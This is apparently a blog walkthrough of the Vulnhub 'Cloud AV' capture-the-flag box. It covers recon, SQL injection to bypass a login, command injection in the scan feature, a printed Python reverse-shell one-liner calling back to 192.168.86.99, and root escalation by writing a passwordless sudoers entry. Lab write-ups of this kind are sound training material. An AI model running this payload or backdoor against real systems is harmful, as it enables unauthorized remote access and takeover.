Vulnhub BoredHackerBlog: Cloud AV Walkthrough
- by Vince
-
in Blog
-
Hits: 2755
The description states: "Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service. Currently, it's in beta mode. You've been asked to test the setup and find vulnerabilities and escalate privs."
This box is labeled easy and I think that's fair enough although a couple of sections may hang some people up.
First, we kick off with Nmap:
Not a whole lot of options so we'll explore port 8080:
Meanwhile, Nikto is running:
We find an additional page:
Circling back to the first page, let's see if we can get some sort of injection:
When we select the Log in button, we get:
I'm not sure I've encountered SQLite but the syntax is nearly the same. Instead of: '1 or '1'='1
We go with:
If you're not familiar with SQL injection, basically, we're saying the invite code is (NOTHING) or 1=1. And since 1 does equal 1, a true statement, we bypass this process. And we do...
Assuming we're supposed to choose one of the above files, I choose hello and select Scan! :
Wondering if we can abuse this...
Turns out, we can:
Now I'm wondering if we can get out:
With our handler setup:
Excellent! We can reach out. Let's go for a reverse shell:
What you can't see:
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.86.99",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
With our handler setup:
We catch our shell! Looking around:
We have a compiled binary and what I assume is the source code.
Let's take a look:
Looks like we can abuse it:
We get execution of a command as root. Excellent! Let's shove our user into sudoers with all permissions and no password:
We sudo su and we're root!
Nice box!